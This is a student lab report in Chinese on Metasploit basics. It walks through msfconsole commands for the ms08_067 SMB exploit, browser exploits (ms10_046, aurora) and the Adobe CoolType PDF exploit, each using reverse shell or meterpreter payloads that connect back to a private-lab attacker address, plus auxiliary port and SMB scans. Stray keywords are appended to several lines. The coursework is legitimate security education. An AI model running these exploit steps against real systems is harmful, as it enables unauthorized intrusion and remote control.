Exp5 MSF基礎應用 20164313 杜桂鑫

 

1. 實踐目標

   本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell

  1.1一個主動攻擊實踐,如ms08_067; (1分)

  1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)

  1.3 一個針對客戶端的攻擊,如Adobe;(1分)

  1.4 成功應用任何一個輔助模塊。(0.5分)


2.實踐內容

攻擊機

 

靶機

 

 

2.1一個主動攻擊實踐,ms08_067; (1分)

 輸入 「msfconsole」 及「search ms08_067」進行漏洞搜索windows

輸入「use exploit/windows/smb/ms08_067_netapi」及「show payloads」顯示可調用的攻擊載荷api

輸入「set payload generic/shell_reverse_tcp」設置攻擊載荷,tcp反彈鏈接瀏覽器

「set LHOST 192.168.198.145」及「set LPORT 4313」設置回連ip及端口session

set RHOST 192.168.198.147"設置靶機winxp iptcp

「set target 0」自動選擇目標系統類型,匹配度較高學習

「show options」查看設置是否正確網站

最後輸入「exploit」開啓監聽編碼

監聽失敗是由於靶機防火牆沒關url

監聽成功

 2.2 一個針對瀏覽器的攻擊,ms11_046,MS10_002_aurora惟一;(1分)

2.2.1ms11_046

 基本步驟同上,不過是使用「use exploit/windows/browser/ms10_046_shortcut_icon_dllloader」模塊

發現SRVHOST沒填,輸入「set SRVHOST 192.168.198.145」

 

輸入「exploit」,能夠看到生成一個url

在靶機的瀏覽器中訪問該url

輸入「sessions」命令查看當前活動連接

輸入「sessions -i 1」接入ID爲1的活動連接,獲取靶機shell

 

2.2.2MS10_002_aurora漏洞攻擊  惟一

ms10_002颱風漏洞是IE瀏覽器漏洞,也是黑客掛馬利用的最熱門漏洞

輸入「use windows/browser/ms10_002_aurora」調用模塊

「set payload windows/meterpreter/reverse_http」設置http反向回連

而後設置攻擊機ip和攻擊端口 

「set URIPATH 4313dgx」設置統一資源標識符路徑

生成url

 

 

 

攻擊機回連成功

 

  2.3 一個針對客戶端的攻擊;(1分)

 ADOBE

 選擇「use exploit/windows/browser/adobe_cooltype_sing」模塊

「set payload windows/meterpreter/reverse_tcp」設置tcp反向鏈接

設置攻擊機ip和端口

「set FILENAME 20164313.pdf」設置攻擊文件名稱

因爲我用的是 browser 下的攻擊模塊,因此它會生成一個 url 連接,點開會自動下載一個空白的 pdf 文件。

 攻擊成功

輸入「sessions」查看當前會話

「sessions -i 1」及「shell」  選擇第一個會話,獲取靶機shell

  2.4 成功應用任何一個輔助模塊。(0.5分)

 2.4.1  tcp端口掃描

輸入「use auxiliary/scanner/portscan/tcp」 掃描目標主機上TCP使用的端口號

「set RHOST 192.168.198.147」設置靶機ip

2.4.2  smb_version

輸入「scanner/smb/smb_version」查看靶機的smb版本

「set RHOST 192.168.198.147」設置靶機ip

 

2.4.3  udp

輸入「use auxiliary/scanner/discovery/udp_sweep」 檢測目標主機上經常使用的udp服務

「set RHOSTS 192.168.198.147」設置靶機ip

 


 

3.基礎問題回答

用本身的話解釋什麼是exploit,payload,encode?

  

答:  exploit:滲透攻擊,利用發現的漏洞對靶機進行攻擊。

 payload:攻擊載荷,滲透攻擊成功後在系統中運行的模塊,即經過滲透攻擊把攻擊載荷運至靶機中。

 Ecode:編碼器,對代碼進行異或、祛除壞字符及其餘編碼,保護攻擊載荷不被發現。

 

離實戰還缺些什麼技術或步驟?

 

答:咱們學會了初步的滲透、免殺、攻擊,但在實戰中如何讓靶機運行咱們製做的病毒文件是咱們缺乏的,由於我不會傻傻的訪問一個我不瞭解網站,而後下載一個對我沒有意義的文件,更不用說運行那個文件了。


 

4.實踐總結與體會

    此次實驗其實並不難,也讓我對msf功能的強大有了進一步的認識,可是發現本身對msf的瞭解還不夠,對於一些指令的理解也不透徹。另外,也認識到世界上沒有完美的程序,總會存在各類各樣的漏洞,可以被黑客利用,平時仍是須要更認真學習的。

相關文章
相關標籤/搜索